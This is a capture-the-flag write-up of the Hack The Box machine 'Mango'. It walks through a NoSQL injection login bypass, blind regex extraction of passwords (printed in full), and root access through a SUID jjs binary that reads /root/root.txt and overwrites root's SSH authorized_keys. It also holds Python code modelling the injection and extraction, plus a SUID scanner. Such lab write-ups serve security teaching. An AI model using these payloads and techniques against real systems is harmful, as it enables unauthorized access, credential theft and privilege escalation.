When life gives you mangos. This box has little to do with real mangos; its name differs by only one letter from a well-known NoSQL platform, and that is also the way in. An interesting Medium box that raised my score by 30 points and took me from Hacker to Pro Hacker on Hack The Box.
[0x1] Reconnaissance & Enumeration
A new box, a new scan. It sounds boring, but every box starts with a good scan; it gives a clear picture of where the journey can begin.
nmap -sC -sV -T5 -p- -oA ~/Documents/boxes/mango/mango-allports 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 11:37 GMT
Nmap scan report for staging-order.mango.htb (10.10.10.162)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Sweet & Juicy
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80, by IP address or by the hostname mango.htb, shows no website. Port 443 does show one, but the first thing you get is a certificate warning.
Tip: if you get a certificate warning, always inspect the certificate. Even when you expect it to be invalid it is usually worth it: Mango's certificate contains an interesting hostname, staging-order.mango.htb. Add it to /etc/hosts for 10.10.10.162 so the virtual host resolves (that is also why Nmap already shows that name above).
Before following up on the hostname from the certificate I first go through the standard website. There is nothing immediately interesting: it is a search engine in the style of Google, but XSS and similar tricks get you nowhere. The analytics link gives access to all kinds of data, but that belongs in the rabbit-hole archive.
Then I try the hostname from the certificate. That looks a lot better.
[0x2] Initial foothold
Here too I started on all kinds of ways to abuse the login form. SQL injection did not work, but when I tried NoSQL injection I got a surprising result: a page that says Under Plantation. So NoSQL injection is possible. The payload below sends both fields as arrays carrying the $ne (not equal) operator. PHP turns username[$ne]=dopamine into an array, and if that array goes straight into the MongoDB query it becomes {"$ne": "dopamine"}, which matches any account whose username and password are not dopamine, so the login succeeds without knowing either.
username[$ne]=dopamine&password[$ne]=dopamine&login=login
Coincidentally, I recently saved the URL of a handy tool that does NoSQL injection and is built for MongoDB (hey, that sounds like Mango ;)).
git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git
Cloning into 'Nosql-MongoDB-injection-username-password-enumeration'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 56 (delta 15), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (56/56), done.
The Python script takes a number of parameters: the URL, the names of the username and password fields, the field to enumerate and the name and value of the login button. It builds each value up character by character with $regex patterns: a prefix is kept when the login succeeds with it (the "Pattern found" lines) and dropped when it does not. I removed some of the output so the list does not get very long.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
2 username(s) found:
admin
mango
Two usernames in the pocket. Now I do the same again, but for the passwords.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep password -m POST
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
Two hits here too. The password enumeration does not say which password belongs to which user, but with two of each you find out quickly enough by trying to log in:
- Username: admin / Password: t9KcS3>!0B#2
- Username: mango / Password: h3mXK8RhU~f{]f5H
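The $ne bypass and the character-by-character extraction the tool performs, as an added example that is not from the original post or from the tool's repository: a Python model of the injectable PHP/MongoDB login (the user collection is constructed from the two credentials found above), the same blind $regex extraction, and the hardened handler beside it. Assumed: the field names username and password, and that the handler passes PHP's form arrays straight into the query, which is what the [$ne] result implies. Pinning the username while extracting the password also answers the pairing question above.

```python
import re
import string
from typing import Dict, List, Optional
from urllib.parse import parse_qsl

# Constructed stand-in for the MongoDB users collection behind the login form;
# the two credentials are the ones recovered in the writeup.
USERS = [
    {"username": "admin", "password": "t9KcS3>!0B#2"},
    {"username": "mango", "password": "h3mXK8RhU~f{]f5H"},
]
CHARSET = string.ascii_letters + string.digits + string.punctuation


def php_parse_form(body: str) -> dict:
    """Mimic PHP's $_POST handling: key[$op]=v becomes {'key': {'$op': 'v'}}.
    This array is what turns into a query operator when passed to MongoDB."""
    form: dict = {}
    for key, value in parse_qsl(body):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            form.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            form[key] = value
    return form


def _matches(value: str, cond) -> bool:
    """The slice of MongoDB query semantics needed here: a plain string means
    equality, a dict holds operators ($ne, $regex)."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$regex":
            if re.search(arg, value) is None:
                return False
        else:
            raise ValueError(f"operator {op} not modelled")
    return True


def vulnerable_login(form: dict) -> bool:
    """Model of the injectable handler: form fields go into the query as-is,
    so an array from the form becomes a query operator."""
    query = {"username": form["username"], "password": form["password"]}
    return any(all(_matches(doc[f], c) for f, c in query.items()) for doc in USERS)


def hardened_login(form: dict) -> bool:
    """Same handler with the fix: only strings may reach the query, so
    username[$ne]=x is rejected instead of becoming {"$ne": "x"}."""
    user, pw = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return vulnerable_login({"username": user, "password": pw})


def _oracle(field: str, pattern: str, pinned: Optional[str]) -> bool:
    """One blind query: does an account have `field` matching `pattern`?
    The other field is pinned to a known value or bypassed with $ne."""
    other = "password" if field == "username" else "username"
    form = {field: {"$regex": pattern},
            other: pinned if pinned is not None else {"$ne": ""}}
    return vulnerable_login(form)


def extract_field(field: str, pinned: Optional[str] = None, charset: str = CHARSET) -> List[str]:
    """Recover every distinct value of `field` one character at a time, as the
    tool does: grow a prefix with ^prefix, confirm a complete value with ^prefix$.
    Regex metacharacters are escaped, which matters for a password like h3mXK8RhU~f{]f5H."""
    values, stack = [], [""]
    while stack:
        prefix = stack.pop()
        if prefix and _oracle(field, "^" + re.escape(prefix) + "$", pinned):
            values.append(prefix)
        for ch in charset:
            if _oracle(field, "^" + re.escape(prefix + ch), pinned):
                stack.append(prefix + ch)
    return sorted(values)


def enumerate_credentials() -> Dict[str, Optional[str]]:
    """Usernames first, then each password with the username pinned, so the
    result states which password belongs to which account."""
    return {u: (extract_field("password", pinned=u) or [None])[0]
            for u in extract_field("username")}


if __name__ == "__main__":
    bypass = "username[$ne]=dopamine&password[$ne]=dopamine&login=login"
    print("vulnerable:", vulnerable_login(php_parse_form(bypass)))
    print("hardened:", hardened_login(php_parse_form(bypass)))
    print(enumerate_credentials())
```

Against a real target each _oracle call is one POST to the form and the success criterion is whatever the application returns on a valid login (here the Under Plantation page); everything else, including the escaping of regex metacharacters, stays the same.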
First I try to log in over SSH as admin, but without result. The port is open according to the Nmap scan, but apparently this user is not allowed to connect over SSH.
ssh admin@10.10.10.162
admin@10.10.10.162's password:
Permission denied, please try again.
Then I continue with the user mango. This time I get access over SSH and am logged in.
sudo ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
[0x3] Path to User flag
There is nothing interesting in mango's home directory, just some scripts left behind by other HTB players. I browse to admin's home directory and find the user flag there, but I have no rights to read it. From mango's session I switch to admin with su and the admin password found earlier. That works; one step further, and after starting bash I have a full shell.
mango@mango:~$ su admin
Password:
$ whoami
admin
$ bash
[0x4] Path to Root flag
With SimpleHTTPServer I start a web server on my own machine and download LinPEAS (Linux Privilege Escalation Awesome Script) onto the box for further enumeration.
wget http://10.10.14.120:8000/linpeas.sh
--2020-02-26 09:57:54-- http://10.10.14.120:8000/linpeas.sh
Connecting to 10.10.14.120:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 144338 (141K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[================================================================>] 140.96K 159KB/s in 0.9s
2020-02-26 09:57:55 (159 KB/s) - ‘linpeas.sh’ saved [144338/144338]
The script gives a lot of output: it checks the machine for cron jobs, places where I have more rights than I should, vulnerable processes and so on. Twice I run into /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs: once as an interesting file and once in the list of SUID binaries, files that run with the rights of their owner (here root) no matter who executes them. jjs is the command-line tool for Nashorn, the JavaScript engine that ships with the JDK, so a SUID copy of it runs any script you feed it as root.
admin@mango:/tmp$ bash linpeas.sh
linpeas v2.3.4 by carlospolop
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/umount ---> BSD/Linux(08-1996)
/bin/su
/bin/ping
/snap/core/7713/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount ---> BSD/Linux(08-1996)
/snap/core/7713/usr/bin/chfn ---> SuSE_9.3/10
..
..
..
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
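LinPEAS does the SUID check for you above. As an added example that is not from the writeup or from LinPEAS, here is the same check in Python, so it is clear what makes a SUID file "interesting": walk the filesystem for files with the set-user-ID bit and flag the ones worth a second look (interpreter-like binaries such as jjs, anything under a JVM directory, world-writable ones, and ones outside the package-managed directories). The watch-list of names and the sample entries are constructed for this example; the paths in the sample come from the LinPEAS output above, their modes are assumed.

```python
import os
import stat
from pathlib import PurePosixPath

# Constructed watch-list for this example: binaries that execute whatever code
# they are given, so SUID root on any of them is a straight privilege escalation.
INTERPRETER_LIKE = {
    "jjs", "java", "python", "python2", "python3", "perl", "ruby", "node", "php",
    "lua", "bash", "sh", "dash", "zsh", "env", "find", "awk", "gawk", "vim", "vi",
    "nano", "less", "more", "tar", "zip", "cp", "mv", "tee",
}
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/", "/lib/", "/lib64/", "/snap/")

# Constructed sample: paths from the LinPEAS output above, modes assumed.
SAMPLE_ENTRIES = [
    ("/bin/su", 0o104755),
    ("/bin/ping", 0o104755),
    ("/usr/bin/pkexec", 0o104755),
    ("/usr/lib/openssh/ssh-keysign", 0o104711),
    ("/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs", 0o104755),
    ("/usr/bin/python3", 0o100755),     # not SUID, must be ignored
    ("/home/admin/backup", 0o104777),   # SUID, world-writable, not a package file
]


def is_suid(mode: int) -> bool:
    """True for a regular file carrying the set-user-ID bit (the 4 in 4755)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def flag_suid(entries):
    """entries: iterable of (path, st_mode). Returns [(path, reason), ...] for
    the SUID files a privesc hunter or a hardening review should look at first."""
    flagged = []
    for path, mode in entries:
        if not is_suid(mode):
            continue
        reasons = []
        if PurePosixPath(path).name in INTERPRETER_LIKE or "/jvm/" in path:
            reasons.append("runs caller-supplied code as its owner")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable, anyone can replace it")
        if not path.startswith(SYSTEM_PREFIXES):
            reasons.append("outside package-managed directories")
        if reasons:
            flagged.append((path, "; ".join(reasons)))
    return flagged


def scan_suid(root="/"):
    """Walk root and return (path, mode) for every SUID regular file, the
    Python equivalent of: find / -perm -4000 -type f 2>/dev/null"""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _: None):
        # pseudo-filesystems are noise for this check
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode   # lstat: a symlink is never a SUID file
            except OSError:
                continue
            if is_suid(mode):
                found.append((path, mode))
    return sorted(found)


if __name__ == "__main__":
    entries = scan_suid("/")
    print(f"{len(entries)} SUID files found")
    for path, reason in flag_suid(entries):
        print(f"{path}: {reason}")
```

On the sample, only jjs and the out-of-place /home/admin/backup are flagged; su, ping, pkexec and ssh-keysign are SUID by design and only become interesting when their version matches a known CVE, which is a separate check.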
On GTFOBins I come across jjs with a few well-known privilege escalation primitives: one for a shell, one for reading files and one for writing files. To test whether it works I try to read /root/root.txt through jjs.
The breakout succeeds and I can read root.txt. Fine for the points, but yeah... it is not a shell yet.
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
8a8ef79a7a2fbb01ea81688424e9ab15
A second method is writing data. I take the contents of the public key on my Parrot VM and write it to the root user's authorized_keys on Mango. With that I should be able to log in with my private key, without a password, provided root is allowed to log in over SSH (PermitRootLogin in sshd_config). $EXEC is only available when jjs is started with -scripting, and > overwrites any keys already in the file; >> would append instead.
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
$EXEC("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg[[........]]h87orudH7MJ2bFhALQ0=' > /root/.ssh/authorized_keys");
Success! Connecting as root with the authorized key works. Besides the root flag I now also have a full shell on the machine. Who am I? Root!
ssh -i /root/.ssh/id_rsa mango
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Feb 26 09:46:26 UTC 2020
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# hostname
mango
root@mango:~# whoami
root
root@mango:~# ls -l
total 4
-r-------- 1 root root 33 Sep 27 14:32 root.txt
root@mango:~# cat root.txt
8a8ef79a7a2fbb01ea81688424e9ab15